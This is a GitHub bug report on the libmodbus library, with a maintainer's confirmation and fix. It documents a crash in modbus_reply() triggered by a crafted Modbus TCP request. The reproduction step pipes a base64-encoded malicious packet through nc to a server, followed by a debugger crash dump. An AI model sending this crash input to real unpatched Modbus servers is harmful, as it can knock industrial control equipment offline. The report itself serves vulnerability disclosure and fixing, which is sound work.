stephane/libmodbus #612: Untrusted Pointer Dereference in modbus_reply() at modbus.c:1001

AiDaiP, 2021-12-21:
## libmodbus version

ebc4f4788678eda8d99e23be87c61a662a9d26b7

## OS and/or distribution

Ubuntu 20.04 focal

## Environment

,AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Description

Untrusted Pointer Dereference in modbus_reply() at modbus.c:1001

## Expected behaviour

no crash.

## Actual behaviour

Program received signal SIGSEGV, Segmentation fault.

## Steps to reproduce the behavior (commands or source code)

libmodbus/tests/unit-test-server.c

```
./unit-test-server
echo "A90AAAAN/xcBYgABAGoAAQLXEQ==" | base64 -d | nc 127.0.0.1 1502
```

```
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7fbd673 in modbus_reply (ctx=0x5555555592a0, req=<optimized out>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:1001
1001        return (ctx->backend->backend_type == _MODBUS_BACKEND_TYPE_RTU &&
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0xd711f7fc5d60
 RBX  0x8
 RCX  0x0
 RDX  0x5555555594d6 ◂— 0x0
 RDI  0x5555555592dd ◂— 0x11f7fc5d60000000
 RSI  0x7fffffffdeea ◂— 0x200007ffff700
 R8   0x11
 R9   0x0
 R10  0x2
 R11  0xffffff0a
 R12  0xff
 R13  0x5555555592a0 ◂— 0x4000000ff
 R14  0xb
 R15  0x7fffffffdee0 ◂— 0x17ff7fff0000dd03
 RBP  0x555555559320 ◂— 0x17ff0d000000dd03
 RSP  0x7fffffffde90 ◂— 0x3
 RIP  0x7ffff7fbd673 (modbus_reply+243) ◂— or     r12d, dword ptr [rax]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x7ffff7fbd673 <modbus_reply+243>            or     r12d, dword ptr [rax]
   0x7ffff7fbd676 <modbus_reply+246>            mov    eax, r12d
   0x7ffff7fbd679 <modbus_reply+249>            je     modbus_reply+265                <modbus_reply+265>
    ↓
   0x7ffff7fbd689 <modbus_reply+265>            mov    rdi, qword ptr [rsp + 0x158]
   0x7ffff7fbd691 <modbus_reply+273>            xor    rdi, qword ptr fs:[0x28]
   0x7ffff7fbd69a <modbus_reply+282>            jne    modbus_reply+2537                <modbus_reply+2537>
    ↓
   0x7ffff7fbdf69 <modbus_reply+2537>           call   __stack_chk_fail@plt                <__stack_chk_fail@plt>

   0x7ffff7fbdf6e                               nop
   0x7ffff7fbdf70 <modbus_reply_exception>      endbr64
   0x7ffff7fbdf74 <modbus_reply_exception+4>    push   r12
   0x7ffff7fbdf76 <modbus_reply_exception+6>    push   rbp
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libmodbus/libmodbus/src/modbus.c
    996             "Unknown Modbus function code: 0x%0X\n", function);
    997         break;
    998     }
    999
   1000     /* Suppress any responses when the request was a broadcast */
 ► 1001     return (ctx->backend->backend_type == _MODBUS_BACKEND_TYPE_RTU &&
   1002             slave == MODBUS_BROADCAST_ADDRESS) ? 0 : send_msg(ctx, rsp, rsp_length);
   1003 }
   1004
   1005 int modbus_reply_exception(modbus_t *ctx, const uint8_t *req,
   1006                            unsigned int exception_code)
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffde90 ◂— 0x3
01:0008│     0x7fffffffde98 ◂— 0x5555ffffff0b
02:0010│     0x7fffffffdea0 ◂— 0x7fff00000008
03:0018│     0x7fffffffdea8 ◂— 0x8
04:0020│     0x7fffffffdeb0 ◂— 0x200000001
05:0028│     0x7fffffffdeb8 —▸ 0x555555559430 ◂— 0x13000000025 /* '%' */
06:0030│     0x7fffffffdec0 ◂— 0xffffff0a
07:0038│     0x7fffffffdec8 ◂— 0x1300000000
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x7ffff7fbd673 modbus_reply+243
   f 1   0x555555555734 main+692
   f 2   0x7ffff7dd80b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x00007ffff7fbd673 in modbus_reply (ctx=0x5555555592a0, req=<optimized out>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:1001
#1  0x0000555555555734 in main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe198) at unit-test-server.c:183
#2  0x00007ffff7dd80b3 in __libc_start_main (main=0x555555555480 <main>, argc=1, argv=0x7fffffffe198, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe188) at ../csu/libc-start.c:308
#3  0x0000555555555a0e in _start ()
```

## libmodbus output with debug mode enabled

```
The client connection from 127.0.0.1 is accepted
Waiting for an indication...
<03><DD><00><00><00><0D><FF><17><01><62><00><01><00><6A><00><01><02><D7><11>
[1]    961170 segmentation fault  ./unit-test-server
```

stephane, 2022-01-07:
Confirmed on Linux.

stephane, 2022-01-08:
Fixed by b4ef4c1

```shell
The client connection from 127.0.0.1 is accepted
Waiting for an indication...
<03><DD><00><00><00><0D><FF><17><01><62><00><01><00><6A><00><01><02><D7><11>
Illegal data read address 0x163 or write address 0x6A write_and_read_registers
[03][DD][00][00][00][03][FF][97][02]
Waiting for an indication...
```

closed 2022-01-08 by stephane